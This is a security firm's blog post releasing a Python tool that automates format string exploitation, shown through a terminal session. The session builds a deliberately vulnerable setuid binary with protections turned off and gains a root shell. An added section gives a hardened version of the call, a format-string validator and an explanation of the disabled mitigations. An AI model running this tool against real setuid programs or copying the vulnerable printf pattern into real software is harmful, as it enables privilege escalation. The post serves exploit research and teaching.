Here at Redspin, we don’t often get a chance to fool around with binaries. Nevertheless, during an audit we encountered a program with a simple format string attack. Not content with the manual format string exploitation process, we decided to write our own tool to automate it. After much coding, we saw that it was good, and decided to share:
root@bt:~# wget http://www.redspin.com/blog/wp-files/Format%20String%20Auto%20Exploitation.tar.bz2
root@bt:~# tar jxvf Format\ String\ Auto\ Exploitation.tar.bz2
root@bt:~# cd Format\ String\ Auto\ Exploitation
root@bt:~/Format String Auto Exploitation# ls
auto_test.sh format_exploit_automagic.py Makefile printf.c README.txt
root@bt:~# cat printf.c
#include <stdio.h>
int main(int argc, char **argv){printf(argv[1]);}
root@bt:~/Format String Auto Exploitation# make
gcc -w -O0 -ggdb -std=c99 -c printf.c
gcc -static -D_FORTIFY_SOURCE=0 -fno-pie -Wno-format -Wno-format-security -fno-stack-protector -z norelro -z execstack printf.o -o printf
root@bt:~/Format String Auto Exploitation# sudo chmod +s ./printf
root@bt:~/Format String Auto Exploitation# adduser dummy
Adding user `dummy' ...
Adding new group `dummy' (1000) ...
Adding new user `dummy' (1000) with group `dummy' ...
Creating home directory `/home/dummy' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for dummy
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
root@bt:~/Format String Auto Exploitation# su dummy
dummy@bt:/root/Format String Auto Exploitation$ id
uid=1000(dummy) gid=1000(dummy) groups=1000(dummy)
dummy@bt:/root/Format String Auto Exploitation$ ls -al ./printf
-rwsr-sr-x 1 root root 576267 2009-11-25 17:13 ./printf
dummy@bt:/root/Format String Auto Exploitation$ python format_exploit_automagic.py -h
Usage: format_exploit_automagic.py [options] binary
Attempt automatic format string exploitation on the provided binary.
Default action is to insert setreuid(geteuid(),geteuid()); execve('/bin/sh',0,0)
shellcode at the end of the format string, and overwrite the DTOR address of the
binary to return to it.
Options:
-h, --help show this help message and exit
-v, --verbose Increase verbosity (specify multiple times for more) default is 2
-q, --quiet Decrease verbosity (specify multiple times for more)
Overwrite options:
Arguments to determine location to overwrite in binary
-d, --dtor overwrite dtor address (True)
-g function, --got=function Overwrite GOT function (ie: exit)
-c, --code Overwrite first code segment return address found on stack
-a 0x12345678, --address=0x12345678 Custom overwrite address
Exploit options:
Arguments that control the how and where of our shellcode
-s, --string Insert shellcode within format string (True)
-S shellcode, --Shellcode=shellcode Insert Custom shellcode in format string (ie: setuid(0); exec '/bin/sh')
-E, --Environ Put shellcode into environment and use it
-e name, --environ=name Use address of given environment variable
-b 90909090, --bytes=90909090 Find byte string on stack and point to it
-r 0x12345678, --return=0x12345678 Custom shellcode address
-o 123, --offset=123 Custom stack offset to format string
dummy@bt:/root/Format String Auto Exploitation$ python format_exploit_automagic.py ./printf
# whoami
root
# 0wn3d!
(null): 0wn3d!: not found
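An added example, not from the post or the Redspin tool: the hardened form of the printf.c call above, plus a validator for the narrower case where a caller-supplied format string genuinely has to be accepted. echo_fixed, fmt_is_safe and the sample input are names and values chosen here.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* printf.c above calls printf(argv[1]): the input *is* the format string, so
 * "%x" reads stack words and "%n" writes to memory. The fix is to keep the
 * format constant and pass the input as a plain argument. */
static void echo_fixed(const char *user) {
    printf("%s\n", user);
}

/* Where a caller-supplied format must be accepted (a log template, say),
 * validate it first. Each conversion may have flags [-+ #0], a width of at
 * most 4 digits, a precision, a length modifier, then one of "diuxXcs".
 * Rejected: %n, %p, positional "%1$", '*' widths, a dangling '%', and more
 * conversions than max_args, the number of arguments the caller will pass. */
bool fmt_is_safe(const char *fmt, int max_args) {
    int used = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                     /* literal "%%" */
        while (*p && strchr("-+ #0", *p)) p++;       /* flags */
        int width = 0;
        while (*p >= '0' && *p <= '9') { p++; width++; }
        if (width > 4 || *p == '$') return false;    /* huge output / positional */
        if (*p == '.') {                             /* precision */
            p++;
            while (*p >= '0' && *p <= '9') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;     /* length modifier */
        if (!*p || !strchr("diuxXcs", *p)) return false; /* %n, %p, %*, ... */
        if (++used > max_args) return false;
    }
    return true;
}

int main(int argc, char **argv) {
    /* constructed sample input standing in for argv[1] in the post */
    const char *in = argc > 1 ? argv[1] : "AAAA%08x%08x%n";
    echo_fixed(in);
    printf("accepted as a format: %s\n", fmt_is_safe(in, 2) ? "yes" : "no");
    return 0;
}
```

Separately, each flag in the Makefile line above (-D_FORTIFY_SOURCE=0, -z norelro, -fno-pie, -z execstack) switches off a mitigation the tool needs absent: FORTIFY_SOURCE aborts on %n in a format string that lives in writable memory, RELRO makes the DTOR entry read-only, PIE randomizes the address being overwritten and returned to, and a non-executable stack stops shellcode placed in the format string. Confirming those defaults are on is the check to run before trusting a setuid binary like this one.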
The tool and accompanying files are here: Format String Auto Exploitation.tar.bz2, or you can just get the Python script here: format_exploit_automagic.py.
Even though it is a POC, it should be easily modified to support other programs vulnerable to format string attacks, and it has been licensed under the GPLv3 for your hacking needs. I'm considering porting it to Ruby, adding 64-bit exploitation and merging it with the Metasploit tree, but figured I'd release it as-is to see if there's still any interest in old-school binary exploitation. I'm also happy to discuss the techniques the tool uses, if anyone is interested.
Let me know if you have any issues/hacks/recommendations.
POC: What are you thankful for?
Update: The techniques in the post have been updated here.